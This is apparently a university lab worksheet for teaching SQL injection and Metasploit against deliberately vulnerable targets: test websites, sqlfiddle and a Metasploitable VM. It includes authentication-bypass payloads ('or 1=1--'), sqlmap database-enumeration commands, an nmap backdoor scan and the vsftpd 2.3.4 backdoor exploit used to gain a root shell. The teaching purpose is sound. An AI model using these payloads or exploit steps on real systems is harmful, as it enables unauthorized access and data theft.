Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host.

This is
purely for educational purposes. I’m don’t even know you 

Task 1: SQL Injection & Metasploit

1.1 Web Attack Using SQL Injection

SQL injection (SQLi) is an application security weakness that allows attackers to control an
application’s database

– letting them access or delete data, change an application’s data-driven behaviour, and do
other undesirable things

– By tricking the application into sending unexpected SQL commands. SQL injections are
among the most frequent threats to data security.

i. Learn SQL Injection Technique

The exercise is adapted from (https://www.guru99.com/learn-sql-injection-with-

practical-example.html)

The types of attacks that can be performed using SQL injection vary depending on
the type of database engine. The attack works on dynamic SQL statements. A
dynamic statement is a statement that is generated at run time using parameters
password from a web form or URI query string.

Let’s consider a simple web application with a login form. The code for the HTML
form is shown below.

<form action=‘index.php’ method="post">

<input type="email" name="email" required="required"/>

<input type="password" name="password"/>

<input type="checkbox" name="remember_me" value="Remember me"/>

<input type="submit" value="Submit"/>

</form>

 The above form accepts the email address, and password then submits them
to a PHP file named index.php.
 It has an option of storing the login session in a cookie. We have deduced this
from the remember_me checkbox. It uses the post method to submit data.
This means the values are not displayed in the URL.

Let’s suppose the statement at the backend for checking user ID is as follows

SELECT * FROM users WHERE email = $_POST['email'] AND password =

md5($_POST['password']);

Page | 1
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes.
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes. I’m don’t even know you 

 The above statement uses the values of the $_POST[] array directly without
sanitizing them.
 The password is encrypted using MD5 algorithm.

We will illustrate SQL injection attack using sqlfiddle. Open the URL
http://sqlfiddle.com/ in your web browser.

Note: you will have to write the SQL statements

Step 1) Enter this code in left pane

CREATE TABLE `users` (

`id` INT NOT NULL AUTO_INCREMENT,
`email` VARCHAR(45) NULL,
`password` VARCHAR(45) NULL,
PRIMARY KEY (`id`));

insert into users (email,password) values ('m@m.com

',md5('abc'));

Step 2) Click Build Schema

Step 3) Enter this code in right pane

select * from users;

select * from users;

Step 4) Click Run SQL and you will see the query output. Answer the question, what
is the password in encrypted form.

____________________________________________________________________

____________________________________________________________________

Suppose user supplies admin@admin.sys and 1234 as the password. The statement
to be executed against the database would be

SELECT * FROM users WHERE email = 'admin@admin.sys' AND password =

md5('1234');

Page | 2
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes.
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes. I’m don’t even know you 

The above code can be exploited by commenting out the password part and
appending a condition that will always be true. Let’s suppose an attacker provides the
following input in the email address field.

xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ]

xxx for the password.

The generated dynamic statement will be as follows.

SELECT * FROM users WHERE email = 'xxx@xxx.xxx' OR 1 = 1 LIMIT 1 -- ' ] AND

password = md5('1234');

 xxx@xxx.xxx ends with a single quote which completes the string quote
 OR 1 = 1 LIMIT 1 is a condition that will always be true and limits the returned
results to only one record.
 -- ' AND … is a SQL comment that eliminates the password part.

Copy the above SQL statement and paste it in SQL FiddleRun SQL Text box, when
you run the SQL statement, you can see its return a record (which is the password).

In your opinion, why this is dangerous to the web application?

____________________________________________________________________

____________________________________________________________________

ii. SQL Injection Practice

Open this test site https://demo.testfire.net/ . Then Click the online banking login page.
The page will then ask you to enter username and password; you can use SQL
injection technique to bypass the authentication and gain the admin privileges. Enter
the following statement to username and password field to bypass the authentication:

' or 1=1--+
Once you have gain the admin credentials, please provide screenshot of the admin
page
____________________________________________________________________

____________________________________________________________________

How many Account details you can view from the admin page? Please list down all
account number
____________________________________________________________________

____________________________________________________________________

Page | 3
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes.
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes. I’m don’t even know you 

iii. SQL Injection using SQLMap Tool

Sqlmap is open source software that is used to detect and exploit database
vulnerabilities and provides options for injecting malicious codes into them.

You can run SQLMap in Kali Linux by opening a terminal and type this command
#sqlmap. In this practice we will use http://testphp.vulnweb.com as the test site.

You can list information about the existing databases using SQLMap using this
command

# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

From the output, what is the database version and the available database on the
server
____________________________________________________________________

____________________________________________________________________

Next, you can list information about all Tables present in a particular Database by
using this command

# sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart –

tables

From the output, please list down all table available in the database
____________________________________________________________________

____________________________________________________________________

If you are interested with SQL injection and want to challenge yourself, you can
explore this website: https://redtiger.labs.overthewire.org/

Page | 4
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes.
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes. I’m don’t even know you 

1.2 Network Attack Using Metasploit Tool

Metasploit is a penetration testing framework that makes hacking simple. It's an essential tool
for many attackers and defenders. Point Metasploit at your target, pick an exploit, what
payload to drop, and hit Enter.

i. Build The Lab Setup

Before we can begin this exercise, we need to setup additional lab environment.
Firstly we need to setup additional internal network. In your virtualbox, click file menu
> preferences > Network Tab. In the network tab, please create additional NAT
Network (called it LabNetwork). After that, you need to import additional VM known as
Metasploitable (You can get it from me). Metasploitable is a VM which contains
vulnerability.

After you have import the VM, you need to add network interface to the Kali and
Metasploitable VM. Make sure the additional network interface is connected to the
NAT Network (LabNetwork) which you just created. You may need to restart you kali
linux VM and also your metasploitable VM.

After you have successfully run both VM, make sure the network is running properly
for both VM. Check the IP address of both VM using #ifconfig command on terminal
and make both VM can ping each other.

ii. Perform Vulnerability Scanning

Before we can begin to use Metasploit tool on Kali to create backdoor on

Metasploitable VM, we need to first perform a network scan to determine the
vulnerability of Metasploitable VM. To start the scan, run this command on your Kali
Linux

# nmap --script ftp-vsftpd-backdoor {your-metasploitableVM-ip} --reason

From the Scan result, it will show the metasploitable VM has vulnerability on it FTP
services. Please state when was the vulnerability been reported?
____________________________________________________________________

____________________________________________________________________

iii. Run Exploit using Metasploit

After we have determined the vulnerability of Metasploitable VM using NMap, it’s time
to exploit it using Metasploit tool in Kali Linux. First you need to run the metasploit
console by entering #msfconsole in terminal. After that, you need to search for ftp
exploit exploit by typing this command msf> search vsftpd. The search may take a
while. After that, you can start to use the exploit by typing

Page | 5
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes.
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes. I’m don’t even know you 

msf > use exploit/unix/ftp/vsftpd_234_backdoor

Then you need to set the target host, by typing msf>set rhost {your-
metasploitableVM-ip}

You can also check your exploit option by typing msf>show options. If everything
has been set, you can execute the exploit to the target host by typing msf>exploit. If
everything goes well, you will take gain access to Metasploitable VM shell.

To verify you have root access, please type whoami, check the VM hostname by
typing hostname. Check the Kernel version by typing uname –a. Provide screenshot
of the output.
____________________________________________________________________

____________________________________________________________________

1.3 Reflection

In your opinion, provide ways to prevent SQL Injection Attack to website under your
administration

____________________________________________________________________

____________________________________________________________________

In your opinion, provide a way to prevent an application level attack using tools such as
Metasploit

____________________________________________________________________

____________________________________________________________________

Page | 6
Disclaimer: Author is not held responsible if the lab exercise is targeted to unauthorized parties or host. This is
purely for educational purposes.